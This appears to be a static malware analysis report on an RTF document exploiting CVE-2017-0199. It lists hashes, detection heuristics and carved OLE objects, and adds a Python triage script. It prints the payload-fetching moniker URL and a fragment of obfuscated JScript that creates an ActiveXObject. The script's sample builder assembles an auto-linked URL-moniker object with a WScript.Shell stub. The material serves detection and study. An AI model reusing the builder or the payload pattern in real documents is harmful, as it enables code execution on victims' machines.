Malicious RTF — malware analysis report

Static analysis result for SHA-256 9b7b7b1a39f7811f…

MALICIOUS

RTF

Size: 1.87 MB
Created: 2017-07-23 16:02:00
First seen: 2017-08-08
MD5: 79d7b486855736189ff78654af4e94b0
SHA-1: de08d27712c642563de20bd9952ba07b22f9b772
SHA-256: 9b7b7b1a39f7811f3eb4c0057d06a49a82227cb418b24d5ec543342632e0e233
Risk Score: 342

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The RTF contains two OLE objects and shows the markers of CVE-2017-0199 (OLE2Link / URL Moniker) exploitation: an automatically linked object whose moniker target is http://192.168.0.199/dir1padpadpad/dir2padpadpad/dir3padpadpad/thisisthepayloadfile.doc, the likely next stage. The host is a private-range (RFC 1918) address, and what it serves (an HTA, a script, or a plain document) cannot be determined from the file alone. The large hex-encoded blocks inside the \objdata sections are a second place where a payload can be hidden.

Heuristics (10)

  • CVE-2017-0199 (OLE2Link / remote URL Moniker) [critical; CVE likely] CVE_2017_0199
    RTF contains a URL Moniker OLE link whose decoded target is remote. Office can fetch and process the response through the CVE-2017-0199 OLE2Link attack path, but the server-side content type is not proven statically.
  • ClamAV: Rtf.Exploit.CVE_2017_0199-6335035-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Rtf.Exploit.CVE_2017_0199-6335035-0
  • Automatically linked OLE object [high] RTF_OBJAUTLINK
    RTF contains \objautlink, an automatically linked OLE object that Word can update or activate when it opens the document.
  • Package object class [high] RTF_OBJCLASS_PACKAGE
    OLE Package object; a Package can wrap an arbitrary file, including executables and scripts.
  • Large hex data blocks in OLE object [high] RTF_EXCESSIVE_HEX
    RTF contains ~1892 KB of hex-encoded data inside \objdata sections, which may hide a payload.
  • Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • OLE object data [medium] RTF_OBJDATA
    RTF contains 2 \objdata sections (embedded OLE objects).
  • Embedded OLE object [medium] RTF_OBJEMB
    RTF contains \objemb, an embedded OLE object.
  • OlePres presentation stream in RTF OLE object [medium] RTF_OLEPRES_STREAM
    RTF contains an embedded OLE object with an OlePres presentation stream. OlePres is an ordinary OLE presentation marker and is not enough on its own to identify CVE-2025-21298.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://192.168.0.199/dir1padpadpad/dir2padpadpad/dir3padpadpad/thisisthepayloadfile.doc (in RTF body; the URL Moniker target named above)
    • http://schemas.microsoft.com/office/word/2003/wordml (in RTF body; a benign WordprocessingML XML namespace identifier, not a fetch target)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

objdata_00_off00003082.bin
  Kind: rtf-objdata-decoded
  Source: RTF \objdata at offset 0x3082
  Size: 13078 bytes
  SHA-256: 27c9f7ae73e8a264a53de3fc8996c9c217df1f0f4e9e18a1869b2a5fb1684fcc

objdata_01_off001d1bc7.bin
  Kind: rtf-objdata-decoded
  Source: RTF \objdata at offset 0x1D1BC7
  Size: 4129 bytes
  SHA-256: 2ca0c9e2e427ec790c95651ba0d173e37bdac36ee2138471aa45fe364e16ad58
Detection (carved artifacts)
ClamAV: No threats found (the whole-file ClamAV signature above does not fire on the carved objects)
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s); the fragment, truncated in the report, is obfuscated JScript rather than machine-code shellcode:
  WScript.Quit()}}function vupuoGhPJITUcTaOb(){for(x=5592;4078>x;x++);for(x=6750;3466>x;x++);var r=new ActiveXObject(d([24,36,1,39,34,17,58,43,22,123,21,47,25,5,54,1,29]
Carved artifact contains 2 shell/COM execution token(s), consistent with the WScript and ActiveXObject calls visible in the fragment.
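The checks behind the heuristics above, in working form: carving each \objdata group out of an RTF, decoding its hex, locating the URL Moniker CLSID and the target behind it, deciding whether that target is remote, flagging \objautlink, \objemb and the Package class, measuring the hex volume, and counting shell/COM execution tokens in the decoded bytes the way the carved-artifact check does. This is an added example and not the report's or any scanner's own code; the token list, the `triage_rtf` and `build_sample_rtf` helper names, and the sample document (constructed inline, with its moniker pointing at the URL named in this report) are assumptions.

```python
"""Added illustrative example (not the report's own tooling): the RTF/OLE
checks behind the heuristics above, run on a constructed sample."""
import re
import struct
from urllib.parse import urlparse

# CLSID_StdURLMoniker {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} as serialised on
# disk: Data1..Data3 little-endian, Data4 byte-for-byte.
URL_MONIKER_CLSID = bytes.fromhex("e0c9ea79f9bace118c8200aa004ba90b")

# Assumed token list for the "shell/COM execution token" count.
EXEC_TOKENS = (b"ActiveXObject", b"WScript", b"Shell.Application",
               b"cmd.exe", b"powershell", b"rundll32")


def rtf_groups(rtf: str, control: str):
    """Yield the body of every {\\*\\<control> ...} group, honouring nested
    braces and skipping backslash-escaped characters."""
    for m in re.finditer(r"\{\\\*\\" + control + r"\b", rtf):
        depth, i = 0, m.start()
        while i < len(rtf):
            c = rtf[i]
            if c == "\\":          # escaped char or control word: skip it
                i += 2
                continue
            if c == "{":
                depth += 1
            elif c == "}":
                depth -= 1
                if depth == 0:
                    yield rtf[m.end():i]
                    break
            i += 1


def decode_objdata(body: str) -> bytes:
    """Turn the hex payload of an \\objdata group into bytes. Control words
    inside the group are dropped first so their letters are not read as hex."""
    body = re.sub(r"\\[A-Za-z]+-?\d*\s?", "", body)
    hexchars = re.sub(r"[^0-9A-Fa-f]", "", body)
    return bytes.fromhex(hexchars[: len(hexchars) & ~1])


def url_moniker_targets(blob: bytes) -> list:
    """Return each URL stored behind a URL Moniker CLSID. On disk the CLSID is
    followed by a 4-byte byte count and a NUL-terminated UTF-16LE URL."""
    targets, pos = [], blob.find(URL_MONIKER_CLSID)
    while pos != -1:
        start = pos + len(URL_MONIKER_CLSID)
        if start + 4 > len(blob):
            break
        (length,) = struct.unpack_from("<I", blob, start)
        raw = blob[start + 4:start + 4 + length]
        targets.append(raw.decode("utf-16-le", errors="replace").rstrip("\x00"))
        pos = blob.find(URL_MONIKER_CLSID, start)
    return targets


def is_remote(url: str) -> bool:
    """A target is remote when Office must reach a network host: http/https/ftp
    schemes, UNC paths, or file:// with a non-local host."""
    p = urlparse(url)
    if p.scheme.lower() in ("http", "https", "ftp"):
        return True
    return url.startswith("\\\\") or (p.scheme == "file" and p.netloc not in ("", "localhost"))


def triage_rtf(rtf: str) -> dict:
    """Apply the report's RTF heuristics and return the findings."""
    f = {
        "objautlink": "\\objautlink" in rtf,
        "objemb": "\\objemb" in rtf,
        "package_class": re.search(r"\\objclass\s+Package\b", rtf) is not None,
        "objdata_count": 0, "hex_chars": 0,
        "targets": [], "remote_targets": [], "exec_tokens": [],
    }
    for body in rtf_groups(rtf, "objdata"):
        blob = decode_objdata(body)
        f["objdata_count"] += 1
        f["hex_chars"] += 2 * len(blob)
        for url in url_moniker_targets(blob):
            f["targets"].append(url)
            if is_remote(url):
                f["remote_targets"].append(url)
        f["exec_tokens"] += [t.decode() for t in EXEC_TOKENS if t in blob]
    return f


def build_sample_rtf(url: str) -> str:
    """Constructed test input: an \\objautlink object whose \\objdata carries a
    URL Moniker pointing at `url`, plus an embedded Package whose hex wraps a
    one-line JScript stub. Enough to drive the parser; not an exploit."""
    target = url.encode("utf-16-le") + b"\x00\x00"
    moniker = URL_MONIKER_CLSID + struct.pack("<I", len(target)) + target
    link_blob = b"OLE2Link\x00" + b"\x00" * 7 + moniker
    pkg_blob = b"var r=new ActiveXObject('WScript.Shell');"
    return (r"{\rtf1"
            r"{\object\objautlink{\*\objclass Word.Document.8}{\*\objdata "
            + link_blob.hex() + "}}"
            r"{\object\objemb{\*\objclass Package}{\*\objdata "
            + pkg_blob.hex() + "}}}")


if __name__ == "__main__":
    sample = build_sample_rtf("http://192.168.0.199/dir1padpadpad/dir2padpadpad/"
                              "dir3padpadpad/thisisthepayloadfile.doc")
    for k, v in triage_rtf(sample).items():
        print(f"{k}: {v}")
```

Run as a script it prints the findings for the constructed sample; on a real document `hex_chars` is the figure the RTF_EXCESSIVE_HEX rule reports and `remote_targets` is what the CVE-2017-0199 rule keys on. The token scan only sees ASCII text, so a script stored as UTF-16 inside a Package would need a second decode pass. What the remote host actually serves still cannot be decided from the file, which is the caveat the heuristic itself records.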